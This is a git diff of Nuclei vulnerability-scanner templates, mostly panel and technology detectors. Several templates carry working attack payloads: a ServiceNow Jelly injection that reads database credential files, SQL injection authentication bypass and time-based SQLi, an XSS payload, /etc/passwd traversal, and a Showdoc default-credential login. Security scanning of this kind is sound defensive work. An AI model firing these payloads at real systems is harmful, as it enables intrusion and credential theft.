file mode 100644 index 3e8a23796b..0000000000 --- a/nuclei-templates/Other/server-backup-login-10156.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: server-backup-login - -info: - name: Server Backup Manager SE Login - author: dhiyaneshDKi,pathtaga - severity: info - reference: https://www.exploit-db.com/ghdb/6949 - tags: paneil,idera - -requests: - - method: GET - path: - - '{{BaseURL}}/login.zul' - - matchers-condition: and - matchers: - - type: word - words: - - 'Idera Server Backup Manager SE ' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/server-backup-manager-se-10157.yaml b/nuclei-templates/Other/server-backup-manager-se-10157.yaml index 9e8e641acf..94694b6aee 100644 --- a/nuclei-templates/Other/server-backup-manager-se-10157.yaml +++ b/nuclei-templates/Other/server-backup-manager-se-10157.yaml @@ -1,33 +1,22 @@ id: server-backup-manager-se info: - name: Server Backup Manager SE Panel - Detect + name: Server Backup Manager SE author: dhiyaneshDK severity: info - description: Server Backup Manager SE login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"Server Backup Manager SE" - tags: panel,server,backup,manager + reference: https://www.shodan.io/search?query=http.title%3A%22Server+Backup+Manager+SE%22 + tags: panel -http: +requests: - method: GET path: - '{{BaseURL}}/login.zul' matchers-condition: and matchers: - - type: regex - part: body - regex: - - ".*(Server Backup Manager SE).*" - + - type: word + words: + - 'Server Backup Manager SE ' - type: status status: - 200 - -# Enhanced by md on 2023/01/16 diff --git a/nuclei-templates/Other/servfail-refused-hosts.yaml b/nuclei-templates/Other/servfail-refused-hosts.yaml deleted file mode 100644 index 094e1bd46e..0000000000 --- a/nuclei-templates/Other/servfail-refused-hosts.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: servfail-refused-hosts - -info: - name: Servfail Host Finder - author: pdteam - severity: info - tags: dns,takeover - -dns: - - name: "{{FQDN}}" - type: A - - matchers: - - type: word - words: - - "SERVFAIL" - - "REFUSED" diff --git a/nuclei-templates/Other/service-pwd-10179.yaml b/nuclei-templates/Other/service-pwd-10179.yaml deleted file mode 100644 index f42c28b6b7..0000000000 --- a/nuclei-templates/Other/service-pwd-10179.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: service-pwd -info: - name: Service password file - author: pussycat0x - severity: high - description: Searches for sensitive service.pwd file. - reference: https://www.exploit-db.com/ghdb/7256 - tags: exposure,listing,service - -requests: - - method: GET - path: - - "{{BaseURL}}/_vti_pvt/service.pwd" - - matchers-condition: and - matchers: - - type: word - words: - - "# -FrontPage-" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/service-pwd.yaml b/nuclei-templates/Other/service-pwd.yaml new file mode 100644 index 0000000000..6382f9de19 --- /dev/null +++ b/nuclei-templates/Other/service-pwd.yaml @@ -0,0 +1,22 @@ +id: service-pwd +info: + name: Service password file + author: pussycat0x + severity: high + description: Searches for sensitive service.pwd file. + reference: + - https://www.exploit-db.com/ghdb/7256 + tags: exposure,listing,service +requests: + - method: GET + path: + - "{{BaseURL}}/_vti_pvt/service.pwd" + matchers-condition: and + matchers: + - type: word + words: + - "# -FrontPage-" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/servicenow-db-exploit.yaml b/nuclei-templates/Other/servicenow-db-exploit.yaml deleted file mode 100644 index 88273ac876..0000000000 --- a/nuclei-templates/Other/servicenow-db-exploit.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: Template-Injection-on-ServiceNow - -info: - name: Jelly Template Injection on ServiceNow - author: Brut Security - severity: Critical - description: | - This template detects Jelly Scripting Injection vulnerabilities by injecting a payload and checking for a db exploitation result in the response. - reference: - - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data - -http: - - raw: - - | - GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - words: - - "glide.db.properties" - - "glide.db.name" - - "glide.db.rdbms" - - "glide.db.url" - - "glide.db.user" - - "glide.db.password" - part: body diff --git a/nuclei-templates/Other/servicenow-helpdesk-credential-10175.yaml b/nuclei-templates/Other/servicenow-helpdesk-credential.yaml similarity index 100% rename from nuclei-templates/Other/servicenow-helpdesk-credential-10175.yaml rename to nuclei-templates/Other/servicenow-helpdesk-credential.yaml diff --git a/nuclei-templates/Other/servicenow.yaml b/nuclei-templates/Other/servicenow.yaml new file mode 100644 index 0000000000..1af8e26f56 --- /dev/null +++ b/nuclei-templates/Other/servicenow.yaml @@ -0,0 +1,27 @@ +id: Template-Injection-on-ServiceNow + +info: + name: Jelly Template Injection on ServiceNow + author: Brut Security + severity: Critical + description: | + This template detects Jelly Scripting Injection vulnerabilities by injecting a payload and checking for a specific multiplication result in the response. + reference: + - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data + +http: + - raw: + - | + GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(668.5*2);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 + Host: {{Hostname}} + Connection: close + + matchers-condition: and + matchers: + - type: word + words: + - "1337" + part: body + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/sgp-login-panel-10184.yaml b/nuclei-templates/Other/sgp-login-panel-10184.yaml deleted file mode 100644 index 15ee1ecf69..0000000000 --- a/nuclei-templates/Other/sgp-login-panel-10184.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: sgp-login-panel - -info: - name: SGP Panel - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22SGP%22 - tags: panel,sgp - -requests: - - method: GET - path: - - '{{BaseURL}}/accounts/login?next=/admin/' - - matchers-condition: and - matchers: - - type: word - words: - - 'SGP' - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - ">Ver\\. ([0-9.A-Z]+)

    " diff --git a/nuclei-templates/Other/sgp-login-panel.yaml b/nuclei-templates/Other/sgp-login-panel.yaml new file mode 100644 index 0000000000..8d70bb2b08 --- /dev/null +++ b/nuclei-templates/Other/sgp-login-panel.yaml @@ -0,0 +1,26 @@ +id: sgp-login-panel +info: + name: SGP Panel + author: dhiyaneshDK + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22SGP%22 + tags: panel,sgp +requests: + - method: GET + path: + - '{{BaseURL}}/accounts/login?next=/admin/' + matchers-condition: and + matchers: + - type: word + words: + - 'SGP' + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - ">Ver\\. ([0-9.A-Z]+)

    " diff --git a/nuclei-templates/Other/sharecenter-login-10190.yaml b/nuclei-templates/Other/sharecenter-login-10190.yaml new file mode 100644 index 0000000000..9d44383380 --- /dev/null +++ b/nuclei-templates/Other/sharecenter-login-10190.yaml @@ -0,0 +1,19 @@ +id: sharecenter-login + +info: + name: ShareCenter Login Page + author: dhiyaneshDk + severity: info + reference: https://www.exploit-db.com/ghdb/6892 + tags: panel,login + +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - "ShareCenter" + - "Please Select Your Account" + condition: and diff --git a/nuclei-templates/Other/sharecenter-login.yaml b/nuclei-templates/Other/sharecenter-login.yaml deleted file mode 100644 index ca2c625381..0000000000 --- a/nuclei-templates/Other/sharecenter-login.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: sharecenter-login -info: - name: ShareCenter Login Page - author: dhiyaneshDk - severity: info - reference: https://www.exploit-db.com/ghdb/6892 - tags: panel,login -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers: - - type: word - words: - - "ShareCenter" - - "Please Select Your Account" - condition: and diff --git a/nuclei-templates/Other/shell-history-10192.yaml b/nuclei-templates/Other/shell-history-10192.yaml deleted file mode 100644 index a02b5b8389..0000000000 --- a/nuclei-templates/Other/shell-history-10192.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: shell-history - -info: - name: Shell History - author: pentest_swissky,geeknik - severity: low - description: Discover history for bash, ksh, sh, and zsh - tags: config - -requests: - - method: GET - redirects: true - max-redirects: 1 - path: - - "{{BaseURL}}/.bash_history" - - "{{BaseURL}}/.ksh_history" - - "{{BaseURL}}/.sh_history" - - "{{BaseURL}}/.zsh_history" - - matchers-condition: and - matchers: - - type: word - words: - - "ls" - - "mkdir " - - "chmod " - - "mv " - - "nano " - - "vim " - - "pico " - - "sudo " - - "cd " - - "cp " - - "ps aux " - condition: or - - - type: status - status: - - 200 - - - type: word - words: - - "" - - "text/html" - part: all - negative: true diff --git a/nuclei-templates/Other/shell-history.yaml b/nuclei-templates/Other/shell-history.yaml new file mode 100644 index 0000000000..cea7debae7 --- /dev/null +++ b/nuclei-templates/Other/shell-history.yaml @@ -0,0 +1,39 @@ +id: shell-history +info: + name: Shell History + author: pentest_swissky & geeknik + severity: low + description: Discover history for bash, ksh, sh, and zsh + tags: config +requests: + - method: GET + redirects: true + max-redirects: 1 + path: + - "{{BaseURL}}/.bash_history" + - "{{BaseURL}}/.ksh_history" + - "{{BaseURL}}/.sh_history" + - "{{BaseURL}}/.zsh_history" + matchers-condition: and + matchers: + - type: word + words: + - "chmod " + - "exit" + - "kill " + - "nano " + - "vim " + - "pico " + - "sudo " + - "rm " + - "cd " + - "ps aux " + condition: or + - type: status + status: + - 200 + - type: word + words: + - "Shopware 5 - Backend (c) shopware AG' diff --git a/nuclei-templates/Other/shopware-detect-10213.yaml b/nuclei-templates/Other/shopware-detect-10213.yaml new file mode 100644 index 0000000000..1ec4dee4f3 --- /dev/null +++ b/nuclei-templates/Other/shopware-detect-10213.yaml @@ -0,0 +1,27 @@ +id: shopware-detect + +info: + name: Shopware CMS detect + author: cyllective + severity: info + description: Detects Shopware CMS + tags: tech,shopware,cms + reference: + - https://github.com/shopware/shopware + - https://github.com/shopware/platform + +requests: + - method: GET + path: + - "{{BaseURL}}/admin" + - "{{BaseURL}}/backend" + + matchers: + - type: word + part: body + condition: or + words: + - 'Realisiert mit Shopware' + - 'Realised with Shopware' + - 'Shopware Administration (c) shopware AG' + - 'Shopware 5 - Backend (c) shopware AG' \ No newline at end of file diff --git a/nuclei-templates/Other/shortcode-lfi-10216.yaml b/nuclei-templates/Other/shortcode-lfi-10215.yaml similarity index 100% rename from nuclei-templates/Other/shortcode-lfi-10216.yaml rename to nuclei-templates/Other/shortcode-lfi-10215.yaml diff --git a/nuclei-templates/Other/shoutcast-server-10217.yaml b/nuclei-templates/Other/shoutcast-server-10217.yaml deleted file mode 100644 index 8481c0ec47..0000000000 --- a/nuclei-templates/Other/shoutcast-server-10217.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: shoutcast-server - -info: - name: SHOUTcast Server - author: dhiyaneshDk - severity: info - metadata: - shodan-query: 'http.title:"SHOUTcast Server"' - tags: panel - -requests: - - method: GET - path: - - "{{BaseURL}}/index.html" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "SHOUTcast Server" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/shoutcast-server.yaml b/nuclei-templates/Other/shoutcast-server.yaml new file mode 100644 index 0000000000..c76bcafe5d --- /dev/null +++ b/nuclei-templates/Other/shoutcast-server.yaml @@ -0,0 +1,21 @@ +id: shoutcast-server +info: + name: SHOUTcast Server + author: dhiyaneshDk + severity: info + metadata: + shodan-query: 'http.title:"SHOUTcast Server"' + tags: panel +requests: + - method: GET + path: + - "{{BaseURL}}/index.html" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SHOUTcast Server" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/showdoc-default-login-10221.yaml b/nuclei-templates/Other/showdoc-default-login-10221.yaml new file mode 100644 index 0000000000..4bf519de51 --- /dev/null +++ b/nuclei-templates/Other/showdoc-default-login-10221.yaml @@ -0,0 +1,40 @@ +id: showdoc-default-login +info: + name: Showdoc Default Login + author: pikpikcu + severity: medium + description: Showdoc default credentials were discovered. + reference: + - https://blog.star7th.com/2016/05/2007.html + tags: showdoc,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /server/index.php?s=/api/user/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + username={{username}}&password={{password}}&v_code= + payloads: + username: + - showdoc + password: + - 123456 + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"username":"showdoc"' + - '"user_token":' + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/11 diff --git a/nuclei-templates/Other/showdoc-default-login.yaml b/nuclei-templates/Other/showdoc-default-login.yaml deleted file mode 100644 index 056d562bcb..0000000000 --- a/nuclei-templates/Other/showdoc-default-login.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: showdoc-default-login - -info: - name: Showdoc Default Login - author: pikpikcu - severity: medium - reference: - - https://blog.star7th.com/2016/05/2007.html - tags: showdoc,default-login - -requests: - - raw: - - | - POST /server/index.php?s=/api/user/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - - username={{username}}&password={{password}}&v_code= - - payloads: - username: - - showdoc - password: - - 123456 - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - words: - - '"username":"showdoc"' - - '"user_token":' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/showdoc-default-password-10224.yaml b/nuclei-templates/Other/showdoc-default-password-10224.yaml new file mode 100644 index 0000000000..f992f0dac8 --- /dev/null +++ b/nuclei-templates/Other/showdoc-default-password-10224.yaml @@ -0,0 +1,31 @@ +id: showdoc-default-password + +info: + name: Showdoc Default Password + author: pikpikcu + severity: medium + reference: | + - https://blog.star7th.com/2016/05/2007.html + tags: showdoc,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/server/index.php?s=/api/user/login" + body: | + username=showdoc&password=123456&v_code= + + headers: + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + matchers-condition: and + matchers: + + - type: word + words: + - '"username":"showdoc"' + - '"user_token":' + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/showdoc-default-password.yaml b/nuclei-templates/Other/showdoc-default-password.yaml deleted file mode 100644 index 589bdc7eea..0000000000 --- a/nuclei-templates/Other/showdoc-default-password.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: showdoc-default-password -info: - name: Showdoc Default Password - author: pikpikcu - severity: medium - reference: | - - https://blog.star7th.com/2016/05/2007.html - tags: showdoc,default-login -requests: - - method: POST - path: - - "{{BaseURL}}/server/index.php?s=/api/user/login" - body: | - username=showdoc&password=123456&v_code= - headers: - Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - matchers-condition: and - matchers: - - type: word - words: - - '"username":"showdoc"' - - '"user_token":' - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/showdoc-file-upload-rce-10229.yaml b/nuclei-templates/Other/showdoc-file-upload-rce-10225.yaml similarity index 100% rename from nuclei-templates/Other/showdoc-file-upload-rce-10229.yaml rename to nuclei-templates/Other/showdoc-file-upload-rce-10225.yaml diff --git a/nuclei-templates/Other/sick-beard-xss-10233.yaml b/nuclei-templates/Other/sick-beard-xss-10233.yaml new file mode 100644 index 0000000000..41f8cba47a --- /dev/null +++ b/nuclei-templates/Other/sick-beard-xss-10233.yaml @@ -0,0 +1,30 @@ +id: sick-beard-xss + +info: + name: Sick Beard XSS + author: pikpikcu + severity: medium + tags: xss + reference: + - https://sickbeard.com/ # vendor homepage + - https://github.com/midgetspy/Sick-Beard # software link + metadata: + shodan-query: sickbeard + +requests: + - method: GET + path: + - "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - + part: body + - type: word + words: + - "text/html" + part: header \ No newline at end of file diff --git a/nuclei-templates/Other/sick-beard-xss.yaml b/nuclei-templates/Other/sick-beard-xss.yaml deleted file mode 100644 index 077ac871aa..0000000000 --- a/nuclei-templates/Other/sick-beard-xss.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: sick-beard-xss -info: - name: Sick Beard XSS - author: pikpikcu - severity: medium - reference: - - https://sickbeard.com/ # vendor homepage - - https://github.com/midgetspy/Sick-Beard # software link - metadata: - shodan-query: sickbeard - tags: xss -requests: - - method: GET - path: - - "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - - part: body - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/Other/sidekiq-dashboard-10235.yaml b/nuclei-templates/Other/sidekiq-dashboard-10235.yaml deleted file mode 100644 index ac9e16d30d..0000000000 --- a/nuclei-templates/Other/sidekiq-dashboard-10235.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: sidekiq-dashboard -info: - name: sidekiq-dashboard - author: dhiyaneshDK - reference: - - https://sidekiq.org - - https://github.com/mperham/sidekiq - severity: medium - tags: unauth,panel,sidekiq -requests: - - method: GET - path: - - "{{BaseURL}}/sidekiq" - matchers-condition: and - matchers: - - type: word - words: - - Sidekiq - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/sidekiq-dashboard-10236.yaml b/nuclei-templates/Other/sidekiq-dashboard-10236.yaml new file mode 100644 index 0000000000..81b77a5e7f --- /dev/null +++ b/nuclei-templates/Other/sidekiq-dashboard-10236.yaml @@ -0,0 +1,22 @@ +id: sidekiq-dashboard +info: + name: sidekiq-dashboard + author: dhiyaneshDK + severity: medium + reference: + - https://sidekiq.org + - https://github.com/mperham/sidekiq + tags: unauth,panel,sidekiq +requests: + - method: GET + path: + - "{{BaseURL}}/sidekiq" + matchers-condition: and + matchers: + - type: word + words: + - Sidekiq + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/signatures-10248.yaml b/nuclei-templates/Other/signatures-10248.yaml new file mode 100644 index 0000000000..3ba432f470 --- /dev/null +++ b/nuclei-templates/Other/signatures-10248.yaml @@ -0,0 +1,34 @@ +id: wordpress + +info: + name: WordPress User Name Information - Detect + author: dwisiswant0 + severity: info + description: WordPress user name information check was conducted. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: osint,osint-blog,wordpress + +self-contained: true + +http: + - method: GET + path: + - "https://profiles.wordpress.org/{{user}}/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "user-member-since" + +# digest: 4a0a00473045022100fc04abf609c545f2d62456a051a0d3b96abbadcfb3fd3d61181d47cd3a7b1b77022058d5952c681fe8c9f7184cc6d8620d4b2cf70d36320911b4f9ec11406728bfe0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/liferay.yaml b/nuclei-templates/Other/signatures-10266.yaml similarity index 100% rename from nuclei-templates/Other/liferay.yaml rename to nuclei-templates/Other/signatures-10266.yaml diff --git a/nuclei-templates/Other/simple-crm-sql-injection-10277.yaml b/nuclei-templates/Other/simple-crm-sql-injection-10277.yaml index a3296ec1f7..f22791eea3 100644 --- a/nuclei-templates/Other/simple-crm-sql-injection-10277.yaml +++ b/nuclei-templates/Other/simple-crm-sql-injection-10277.yaml @@ -1,30 +1,34 @@ id: simple-crm-sql-injection - info: - name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass + name: Simple CRM 3.0 SQL Injection and Authentication Bypass author: geeknik severity: high - reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt + description: Simple CRM 3.0 is susceptible to SQL injection and authentication bypass vulnerabilities. + reference: + - https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: + cwe-id: CWE-89 tags: sqli,simplecrm,auth-bypass,injection - requests: - method: POST path: - "{{BaseURL}}/scrm/crm/admin" body: "email='+or+2>1+--+&password=&login=" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "" part: body - - type: word words: - "text/html" part: header + +# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/Other/simple-image-manipulator-lfi-10282.yaml b/nuclei-templates/Other/simple-image-manipulator-lfi-10282.yaml index bca04eb599..23942f0918 100644 --- a/nuclei-templates/Other/simple-image-manipulator-lfi-10282.yaml +++ b/nuclei-templates/Other/simple-image-manipulator-lfi-10282.yaml @@ -1,5 +1,4 @@ id: simple-image-manipulator-lfi - info: name: Simple Image Manipulator v1.0 - Remote file download author: dhiyaneshDK @@ -7,18 +6,15 @@ info: description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location. reference: https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html tags: wordpress,wp-plugin,lfi,wp - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd' - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/nuclei-templates/Other/simplebooklet-takeover-10271.yaml b/nuclei-templates/Other/simplebooklet-takeover-10272.yaml similarity index 100% rename from nuclei-templates/Other/simplebooklet-takeover-10271.yaml rename to nuclei-templates/Other/simplebooklet-takeover-10272.yaml diff --git a/nuclei-templates/Other/site-map-sql-injection.yaml b/nuclei-templates/Other/site-map-sql-injection.yaml new file mode 100644 index 0000000000..e57911d416 --- /dev/null +++ b/nuclei-templates/Other/site-map-sql-injection.yaml @@ -0,0 +1,40 @@ +id: sitemap-sql-injection + +info: + name: Sitemap - SQL Injection + author: Aravind,j4vaovo + severity: high + description: Sitemap is vulnerable to SQL Injection. + reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19 + metadata: + max-request: 2 + google-query: intext:"sitemap" filetype:txt, filetype:xml inurl:sitemap + tags: misconfig,sitemap,sqli + +http: + - raw: + - | + @timeout: 15s + POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(6)),1,2356)# HTTP/1.1 + Host: {{Hostname}} + - | + @timeout: 25s + POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(16)),1,2356)# HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration_1>=6' + - 'status_code_1 == 200' + - 'contains(body_1, "sitemap>")' + condition: and + + - type: dsl + dsl: + - 'duration_2>=16' + - 'status_code_2 == 200' + - 'contains(body_2, "sitemap>")' + condition: and +# digest: 4b0a00483046022100e2230e72cfa50ccf817495cea67f457afeedb37b37a9a188b536ddd92bc32aed022100998d0dcdfb5959fe91c01afdd2fd834b57fdf8c024c5509215b3926aaec1f086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/sitecore-debug-page-10284.yaml b/nuclei-templates/Other/sitecore-debug-page-10284.yaml new file mode 100644 index 0000000000..af6c10e7ba --- /dev/null +++ b/nuclei-templates/Other/sitecore-debug-page-10284.yaml @@ -0,0 +1,24 @@ +id: sitecore-debug-page + +info: + name: SiteCore Debug Page + author: dhiyaneshDK + severity: low + metadata: + shodan-query: 'http.title:"Welcome to Sitecore"' + tags: debug,sitecore + +requests: + - method: GET + path: + - "{{BaseURL}}/sitecore/'" + + matchers-condition: and + matchers: + - type: word + words: + - 'extranet\Anonymous' + + - type: status + status: + - 404 diff --git a/nuclei-templates/Other/sitecore-debug-page.yaml b/nuclei-templates/Other/sitecore-debug-page.yaml deleted file mode 100644 index fb20cc6d6e..0000000000 --- a/nuclei-templates/Other/sitecore-debug-page.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: sitecore-debug-page -info: - name: SiteCore Debug Page - author: dhiyaneshDK - severity: low - metadata: - shodan-query: 'http.title:"Welcome to Sitecore"' - tags: debug,sitecore -requests: - - method: GET - path: - - "{{BaseURL}}/sitecore/'" - matchers-condition: and - matchers: - - type: word - words: - - 'extranet\Anonymous' - - type: status - status: - - 404 diff --git a/nuclei-templates/Other/sitecore-default-page.yaml b/nuclei-templates/Other/sitecore-default-page.yaml new file mode 100644 index 0000000000..4a3d8850ca --- /dev/null +++ b/nuclei-templates/Other/sitecore-default-page.yaml @@ -0,0 +1,34 @@ +id: sitecore-default-page + +info: + name: Sitecore Default Page - Detect + author: DhiyaneshDK,RandomDhiraj + severity: info + description: | + Detect Sitecore Content Management System (CMS). + reference: | + https://www.sitecore.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Welcome to Sitecore" + tags: tech,sitecore,cms + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Welcome to Sitecore" + - 'alt="Sitecore"' + condition: or + + - type: status + status: + - 200 + +# digest: 490a0046304402206b0002615fd8de5ad50ccbe0fbff31092eaf902cab71b4e408f60f08052df1a202206e16fd0e04ce91761ab29cd8c268939227f39a6494925175e6775305051000f5:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/sitecore-login-10287.yaml b/nuclei-templates/Other/sitecore-login-10287.yaml deleted file mode 100644 index 51f838eaae..0000000000 --- a/nuclei-templates/Other/sitecore-login-10287.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: sitecore-login -info: - name: SiteCore Login - author: dhiyaneshDK - severity: info - metadata: - shodan-query: http.title:"Welcome to Sitecore" - tags: panel,sitecore -requests: - - method: GET - path: - - '{{BaseURL}}/sitecore/login/default.aspx' - matchers-condition: and - matchers: - - type: word - words: - - '/sitecore/shell/Themes/Standard/Default/Login.css' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/sitecore-login-10289.yaml b/nuclei-templates/Other/sitecore-login-10289.yaml new file mode 100644 index 0000000000..490d186b8d --- /dev/null +++ b/nuclei-templates/Other/sitecore-login-10289.yaml @@ -0,0 +1,20 @@ +id: sitecore-login +info: + name: SiteCore Login + author: dhiyaneshDK + severity: info + metadata: + shodan-query: 'http.title:"Welcome to Sitecore"' + tags: panel,sitecore +requests: + - method: GET + path: + - '{{BaseURL}}/sitecore/login/default.aspx' + matchers-condition: and + matchers: + - type: word + words: + - '/sitecore/shell/Themes/Standard/Default/Login.css' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/sitecore-version.yaml b/nuclei-templates/Other/sitecore-version-10291.yaml similarity index 100% rename from nuclei-templates/Other/sitecore-version.yaml rename to nuclei-templates/Other/sitecore-version-10291.yaml diff --git a/nuclei-templates/Other/sitecore-workflow-10293.yaml b/nuclei-templates/Other/sitecore-workflow-10293.yaml deleted file mode 100644 index cfeab5b32a..0000000000 --- a/nuclei-templates/Other/sitecore-workflow-10293.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: sitecore-workflow - -info: - name: SiteCore Security Checks - author: pdteam - description: A simple workflow that runs all SiteCore related nuclei templates on a given target. - -workflows: - - template: technologies/sitecore-default-page.yaml - - template: exposed-panels/sitecore-login.yaml - subtemplates: - - tags: vulnerabilities/sitecore-pre-auth-rce.yaml - - template: misconfiguration/sitecore-debug-page.yaml \ No newline at end of file diff --git a/nuclei-templates/Other/sitecore-workflow.yaml b/nuclei-templates/Other/sitecore-workflow.yaml new file mode 100644 index 0000000000..2dc2a27e36 --- /dev/null +++ b/nuclei-templates/Other/sitecore-workflow.yaml @@ -0,0 +1,11 @@ +id: sitecore-workflow + +info: + name: SiteCore Security Checks + author: pdteam + description: A simple workflow that runs all SiteCore related nuclei templates on a given target. + +workflows: + - template: technologies/default-sitecore-page.yaml + subtemplates: + - tags: sitecore \ No newline at end of file diff --git a/nuclei-templates/Other/sitefinity-login-10295.yaml b/nuclei-templates/Other/sitefinity-login-10295.yaml deleted file mode 100644 index 963c89df89..0000000000 --- a/nuclei-templates/Other/sitefinity-login-10295.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: sitefinity-login -info: - name: Sitefinity Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6722 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/Sitefinity/Authenticate/SWT' - matchers-condition: and - matchers: - - type: word - words: - - 'Telerik.Sitefinity.Web.UI.UserPreferences' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/sitefinity-login-10298.yaml b/nuclei-templates/Other/sitefinity-login-10298.yaml new file mode 100644 index 0000000000..823bbe55f9 --- /dev/null +++ b/nuclei-templates/Other/sitefinity-login-10298.yaml @@ -0,0 +1,22 @@ +id: sitefinity-login + +info: + name: Sitefinity Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6722 + tags: panel,sitefinity + +requests: + - method: GET + path: + - '{{BaseURL}}/Sitefinity/Authenticate/SWT' + + matchers-condition: and + matchers: + - type: word + words: + - 'Telerik.Sitefinity.Web.UI.UserPreferences' + - type: status + status: + - 200 diff --git 